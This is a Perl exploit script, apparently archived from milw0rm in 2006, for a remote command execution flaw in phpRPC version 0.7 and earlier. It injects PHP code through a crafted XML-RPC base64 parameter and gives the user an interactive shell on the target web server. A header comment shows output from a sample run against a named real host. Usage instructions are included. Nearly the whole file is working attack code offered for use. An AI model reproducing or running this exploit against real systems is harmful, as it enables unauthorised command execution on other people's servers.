53 lines
No EOL
1.8 KiB
Perl
Executable file
53 lines
No EOL
1.8 KiB
Perl
Executable file
#!/usr/bin/perl
|
|
#
|
|
#root@host [~]# perl rpc.pl phprpc.sourceforge.net /modules/phpRPC/server.php
|
|
#--== IHS IRAN HOMELAND SECURITY ==--
|
|
#
|
|
#phpRPC <= 0.7 commands execute exploit by LorD (http://www.ihs.ir)
|
|
#
|
|
#[IRAN HOMELAND SECURITY]$ uname -a;id;pwd
|
|
#Linux sc8-pr-web9.sourceforge.net 2.6.10-1.771_FC2smp #1 SMP Mon Mar 28 01:10:51 EST 2005 i686 i686 i386 GNU/Linux
|
|
#uid=65534(nfsnobody) gid=65534(nfsnobody) groups=65534(nfsnobody)
|
|
#/home/groups/p/ph/phprpc/htdocs/modules/phpRPC
|
|
#_end_
|
|
#[IRAN HOMELAND SECURITY]$
|
|
#
|
|
#
|
|
# 0rginal Advisory : http://www.gulftech.org/?node=research&article_id=00105-02262006
|
|
# Greetz to NT and C0d3r
|
|
use IO::Socket;
|
|
print "--== IHS IRAN HOMELAND SECURITY ==--\n\n";
|
|
print "phpRPC <= 0.7 commands execute exploit by LorD (http://www.ihs.ir)\n\n";
|
|
if ($ARGV[0] && $ARGV[1])
|
|
{
|
|
$host = $ARGV[0];
|
|
$xml = $ARGV[1];
|
|
$sock = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$host",
|
|
PeerPort => "80") || die "connecterror\n";
|
|
while (1) {
|
|
print '[IRAN HOMELAND SECURITY]$ ';
|
|
$cmd = <STDIN>;
|
|
chop($cmd);
|
|
last if ($cmd eq 'exit');
|
|
$xmldata = "<?xml version=\"1.0\"?><methodCall><methodName>test.method</methodName><params><param><value><base64>'));echo '_begin_\n';echo `".$cmd."`;echo '_end_\n';exit;</param></params></methodCall>";
|
|
print $sock "POST ".$xml." HTTP/1.1\n";
|
|
print $sock "Host: ".$host."\n";
|
|
print $sock "Content-Type: text/xml\n";
|
|
print $sock "Content-Length:".length($xmldata)."\n\n".$xmldata;
|
|
$good=0;
|
|
while ($ans = <$sock>)
|
|
{
|
|
if ($good == 1) { print "$ans"; }
|
|
last if ($ans =~ /^_end_/);
|
|
if ($ans =~ /^_begin_/) { $good = 1; }
|
|
}
|
|
if ($good==0) {print "Exploit Failed\n";exit();}
|
|
}
|
|
}
|
|
else {
|
|
print "Usage: perl rpc.pl host path_to_phpRPC\n\n";
|
|
print "Example: perl rpc.pl target.com /server.php\n";
|
|
exit;
|
|
}
|
|
|
|
# milw0rm.com [2006-03-01] |